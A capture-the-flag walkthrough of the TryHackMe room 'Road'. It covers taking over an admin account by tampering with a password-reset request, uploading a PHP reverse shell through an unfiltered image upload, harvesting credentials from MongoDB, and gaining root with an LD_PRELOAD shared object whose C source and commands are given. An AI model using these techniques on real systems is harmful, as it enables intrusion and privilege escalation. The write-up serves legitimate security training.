Road — TryHackMe

Here we go again…

In this writeup, we’ll pentest a great machine, Road by StillNoob on TryHackMe.

Room: https://tryhackme.com/room/road

We start by performing some active reconnaissance by running Nmap to scan for open ports.

From the scan, We obtain that it is running an apache server on port 80.

By Further poking around on the web application. We find that we can register a new user and sign in.

Once logged in as the user, we find that a user has a profile page and can upload a profile image.

However, only the admin has the access to that feature. That being said, we retrieve the admin email as admin@sky.thm which is written in cleartext on the page.

The next thing we could try is to get access to the website as admin@sky.thm. Observe the reset user page. The Username field is greyed out and only the password fields are editable.

We fire up Burp suite to capture the request by turning the intercept mode on.

then we send the request to the repeater. Now we can change the username from test@test.com to admin@sky.thm and forward the request. As seen from the response below, the password for admin@sky.thm has been changed successfully.

Now we sign in as admin@sky.thm and we can successfully upload a profile image. Inspecting the source code of the profile page. We find a Url pathname has been commented out and it seems to be a reasonable location of where the uploaded profile images are stored.

navigating to the new Url path obtained, we could see our uploaded image and thus proving that our assumption is indeed valid. The uploaded files can be accessed by navigating to this Urlpath below:

http://10.10.113.161/v2/profileimages/{fileNameUplaoded}

There are no filetype filter mechanisms to prevent the uploading of unwanted files that could be malicious. We can use this vulnerability to achieve remote code execution by uploading a reverse shell.

An easy way to obtain a PHP reverse shell is to download it from here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

NB: Make sure to change the IP address and port in the default script to your own IP and port of choice.

set up a Netcat listener and stabilise it with rlwrap to obtain a reverse shell.

Then upload the php-reverse-shell.php in the profile page and try to access it in the URL by navigating to the uploaded php-reverse-shell.php file

http://10.10.44.19/v2/profileimages/php-reverse-shell.php

and bam! We have a shell!

We can further stabilise it by running the following command

python3 -c 'import pty;pty.spawn("/bin/bash")'

now we search for the location of the user.txt file by using the following command and we are able to obtain the file location.

find / -name "user.txt" 2>dev/null

Reading the content of the file, we obtain the flag

Privilege Escalation level 1

In order to read the contents of root.txt which the root user has only access to, we need to escalate our privilege as the root user.

Enumerating the machine more, we find out there are MongoDB and MySQL users in the /etc/passwd file. Which indicates that MongoDB might be running.

You can find the users yourself by running

getent passwd

And then, we can use ss to get the list of all listening ports.

You can investigate the following ports above to figure out what services could be running on them

port 33060: default port for MYSQL (more info can be found here about MySQL default ports)

port 27017: default port for MongoDB (more info can be found here about MongoDB default ports)

From the investigation, we conclude that MongoDB is indeed running. And we can now spin up MongoDB by running mongo on the terminal.

Enter show dbs to list the available databases. The backup database looks the most interesting

Enter use backup to access the backup database.

Enter show collections;to list the tables on the database. We find a table user which could be interesting

Enter db.user.find(); to read the contents of the table. Bam! we obtain passwords for the user webdeveloper

Privilege Escalation level 2

Now, we switch to the webdeveloper user with the newly obtained password. you can either use ssh or just switch with su command on the terminal.

Enumerating this user, we use thesudo -l command to list all commands the webdeveloper user can run using sudo.

LD_PRELOAD is a function that allows any program to use shared libraries. This blog post will give you an idea about the capabilities of LD_PRELOAD.

The steps of this privilege escalation vector can be summarized as follows;

1. Check for LD_PRELOAD (with the env_keep option)
2. Write a simple C code compiled as a share object (.so extension) file
3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

Now lets write a c code to be able to spawn up a root shell and can be written as follows;

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters;

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

We need to run the program by specifying the LD_PRELOAD option, as follows;

sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility

This will result in a shell spawn with root privileges.

NB: sky_backup_utility is the command webdeveloper can run as root

Now we search for the root.txt file and BAM! we obtain the final flag.

Thank you for following this far and I hope it was an informative and enjoyable writeup. Also, should you guys have any suggestions, please leave a comment below.

Until the next…Ciao!

— — — — — — — — — — — — — — THE END — — — — — — — — — — — — —